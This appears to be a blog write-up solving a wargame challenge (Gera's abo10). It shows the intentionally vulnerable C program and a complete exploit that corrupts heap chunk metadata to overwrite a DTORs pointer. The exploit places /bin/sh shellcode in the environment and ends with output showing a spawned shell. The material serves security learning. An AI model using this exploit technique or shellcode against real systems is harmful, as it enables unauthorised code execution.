Monday, May 2, 2011

Advanced Buffer Overflow #10

/* abo10.c                                                   *
* specially crafted to feed your brain by gera@core-sdi.com */

/* Deja-vu                                                   */

char buf[256];

int main(int argv,char **argc) {
       char *pbuf=(char*)malloc(256);

       //gets(buf);
       strcpy(buf, argc[1]);
       free(pbuf);
}


As with abo9, I modified abo10 to use a strcpy().

buf is hanging out in the bss section and the malloc data structures are being overwritten from there.

Since there isn't much to work with, I'm overwriting DTORs to get code execution (see abo5)

This time around, I put the shellcode in env and am using murat's technique to reliability calculate the offset.

The rest is the same as abo9.

#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* nm -n abo10 | grep DTOR */
#define FUNCTION_POINTER ( 0x080495a8 )
/* murat's BUFFER OVERFLOWS DEMYSTIFIED shellcode in env technique */
#define CODE_ADDRESS ( 0xbffffffa - strlen(shellcode) - strlen(VULNERABLE))

#define VULNERABLE "/home/dennis/abo10/abo10"
#define NEGATIVE 0xfffffffc
#define JUNK 0xdefaced

char shellcode[] =
       /* the jump instruction */
       "\xeb\x0appssssffff"
       /* the Aleph One shellcode */
       "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
       "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
       "\x80\xe8\xdc\xff\xff\xff/bin/sh";

int main(void)
{
       char *p;
       char argv1[272 + 1];
       char *argv[] = { VULNERABLE, argv1, NULL };
       char *env[] = { shellcode, NULL };

       p = argv1;

       /* fill pbuf1 with padding */
       memset(p, 'A', 256);
       p += 256;

       /* the prev_size field of the second chunk */
       *((size_t *)p) = (size_t)(NEGATIVE);
       p += 4;

       /* the size field of the second chunk */
       /* the prev_size field of fake chunk */
       *((size_t *)p) = (size_t)(NEGATIVE);
       p += 4;

       /* the size field of the fake chunk */
       *((size_t *)p) = (size_t)(JUNK);
       p += 4;

       /* the fd field of the fake chunk */
       *((void **)p) = (void *)(FUNCTION_POINTER - 12);
       p += 4;
       printf("FUNCTION_POINTER - 12: %p\n", FUNCTION_POINTER - 12);

       /* the bk field of the fake chunk */
       *((void **)p) = (void *)(CODE_ADDRESS);
       p += 4;
       printf("CODE_ADDRESS: %p\n", CODE_ADDRESS);

       *p = '\0';

       execve(argv[0], argv, env);

       return -1;
}

[dennis@localhost abo10]$ ./abo10-exp
FUNCTION_POINTER - 12: 0x804959c
CODE_ADDRESS: 0xbfffffa9
sh-2.04$